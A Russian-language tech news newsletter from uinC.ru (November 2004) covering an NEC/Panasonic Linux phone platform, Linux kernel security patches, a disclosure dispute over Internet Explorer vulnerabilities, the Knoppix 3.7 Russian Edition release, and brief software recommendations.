Компании NEC и Panasonic Mobile Communications официально представили новую программную Linux-платформу для мобильных телефонов третьего поколения - 3G. Интересно в связи с этим отметить. что как минимум один продающийся в японской рознице телефон - NEC N900iL, уже поставляется с этой платформой, а еще два появятся в самом ближайшем времени (один из них - на днях представленный Panasonic P901i). Новая платформа задумывалась как база для телефонов 3G сетей в Японии, однако, согласно совместному заявлению компаний, лицензирование этой разработки доступно для любой компании в мире. Сейчас программная платформа от NEC/Panasonic работает в сети FOMA (Freedom of Mobile-multimedia Access), так называется "фирменная" 3G сеть оператора NTT DoCoMo. Значительным плюсом новой аппаратной платформы разработчики называют совместимость с множеством Linux-приложений, разработанных третьими компаниями. К слову сказать, Linux набирает все большую и большую популярность среди производителей смартфонов, достаточно вспомнить разработку китайской Datang - Qtopia Phone Edition (QPE), представленную на прошлой неделе и заинтересовавшую Toshiba Information Systems, или разработку шанхайской компании E28, на прошлой неделе удостоенной индустриальной премии на ярмарке в Гонконге.
Mobile-Review

21/11/2004 14:58 Выход секьюрити-заплаток для нового ядра Linux
Почти одновременно для недавно вышедшего ядра Linux 2.4.28 были выпущены самые, пожалуй, известные заплатки, существенно повышающие безопасность ядра (ну, и системы в целом, естественно). Речь идёт о знаменитом Openwall-патче от SolarDesigner-а и GRsecurity. Первый вносит изменения в исходный код ядра, позволяющие если и не предотвратить полностью, то существенно затруднить возможность переполнения буфера различными программами. Второй, помимо вышеназванного (ограничения на /proc, fifo, запуск процессов и манипуляции с файловыми линками и т.д.) также добавляет в ядро LIDS - Linux Intrusion Detection/Defence System - систему обнаружения и защиты от вторжения. LIDS позволяет запретить или ограничить доступ к файлам, к памяти, блочным устройствам, сетевым интерфейсам, запущенным программам и т.д. даже для root'а. Правильнее сказать, именно для root'а, так как ограничить доступ для простого пользователя можно и стандартными средствами Linux. Система предназначена для защиты от хакера, который воспользовавшись "дырой" в какой-нибудь программе, получил права root'а. Авторами LIDS являются два студента: Xie Huagang из Китая и Philippe Biondi из Франции.
Openwall-патч
GRsecurity-патч

21/11/2004 15:14 Описание уязвимостей в Internet Explorer
Ранее мы сообщали о том, что на сайте Secunia появилось сообщение о наличии 2-х уязвимостей, обнаруженных неким "cyber flash". Уязвимости позволяли загружать на компьютер жертвы любой файл (в том числе и исполняемый) под видом HTML-файла. Тут же последовали обвинения со стороны ТОЙ_САМОЙ_КОМПАНИИ, которая, собственно и выпускает "браузер всех времён и народов", суть которых заключалась в том, что Secunia не имела права публиковать сообщение об этой уязвимости (тем более, что её наличие было проверено на полнопатченной системе - в IE со всеми обновлениями и с SP2). Secunia в свою очередь начала оправдываться, что подробности уязвимости раскрыты не были и политика компании состоит в скрытии деталей уязвимости до выпуска патча. Некоторые стали подозревать, что под ником "cyber flash" cкрывались специалисты самой Secunia. Точка в споре была поставлена вчера французской группой K-OTik Security Research, которая написала, что "cyber flash" - реально существующий человек, носящий к тому же то ли кличку, то ли фамилию Vengy. Не обращая никакого внимания на праведный гнев Microsoft, группа опубликовала полный и подробный отчёт об обоих обнаруженных уязвимостях. Более того, на странице также приводится код эксплоита.
Описание уязвимости
Пример эксплоита

21/11/2004 16:29 Выход Knoppix 3.7 RE
В свет вышел LiveCD Linux дистрибутив Knoppix 3.7 Russian Edition. В новую версию внесено много улучшений и исправлений, а также включена поддержка русского языка во всех программах первой необходимости. KNOPPIX поддерживает большинство звуковых и видеокарт, SCSI и USB устройств. При загрузке он распознает конфигурацию системы и автоматически настраивает компьютер, сеть, монтирует логические диски и т.п. Дистрибутив содержит все необходимые программы под Linux объемом около 2Gb и позволяет редактировать русские документы (в том числе в формате MS Word и Excel), работать в Интернет, слушать музыку и многое другое. Работая над дистрибутивом, команда ЛинуксЦентра стремилась создать систему, в которой русскоязычные пользователи Linux могли ознакомиться с возможностями этой системы и производить большую часть повседневной работы с компьютером, пользуясь программным обеспечением с русскоязычным интерфейсом. Основные особенности: оконная среда KDE 3.3.0; OpenOffice 1.1.3 с поддержкой форматов MS-Office, а также с проверкой русской орфографии, расстановкой переносов и справкой на русском языке; руссифицированный браузер Mozilla; удобный переключатель/индикатор раскладок клавиатуры kkbswitch; корректная русификация консоли и меню KDE; кириллические шрифты X11. Кстати, сам CD с системой стоит 90 рублей.
Подробности



Программы дня за прошедшую неделю:

15/11/2004 Partition Image
Утилита для создания образов любых разделов жесткого диска следующих файловых систем: ReiserFS, ext2fs/ext3fs, FAT16/32, NTFS, JFS, XFS, HPFS, HFS, UFS. Файл образа может быть сжат при помощи gzip или bzip2, возможно также разбить полученный файл образа на несколько частей, например под размер дискеты. Программа может быть записана как boot/root диск, что позволит запустить ее без установленной Linux системы на жестком диске.
ОС: Unix
Тип программы: Дисковые утилиты

16/11/2004 VideoLAN
Видео плеер, который позволяет производить потоковую видео трансляцию в IPv4 или IPv6 сетях, поддерживаются следующие форматы файлов: MPEG-1, MPEG-2, MPEG-4 и DivX, DVDs, а также спутниковые и телевизионные каналы.
ОС: Cross-platform
Тип программы: Сетевые утилиты

17/11/2004 MAX`s HTML Beauty++ 2004
Профессиональный HTML редактор для MS Windows систем, позволяет создавать как отдельные HTML-файлы, так и проекты, содержащие большое количество HTML и графических файлов. Основные особенности:
+ более подробная подсветка синтаксиса;
+ большое количество различных функций редактирования текста;
+ проверка грамматики и орфографии;
+ библиотека кодов;
+ встроенный предпросмотр;
+ встроенный просмоторщик графических файлов;
+ встроенный конвертор изображений в формат WBMP;
+ большой набор различных скриптов;
+ встроена поддержка HTML TIDY;
и многое другое.
ОС: All Win
Тип программы: HTML


Архив рассылки новостей:
http://uinc.ru/news/archive/


На этом пока все.
Всем удачи.
uinC Team
http://uinc.ru

P.S. Все предложения, замечания и просьбы оставлять здесь:
http://uinc.ru/news/sendnews.php

Любые материалы с нашего сайта или рассылки не могут быть скопированы без разрешения автора или администрации сервера uinC.ru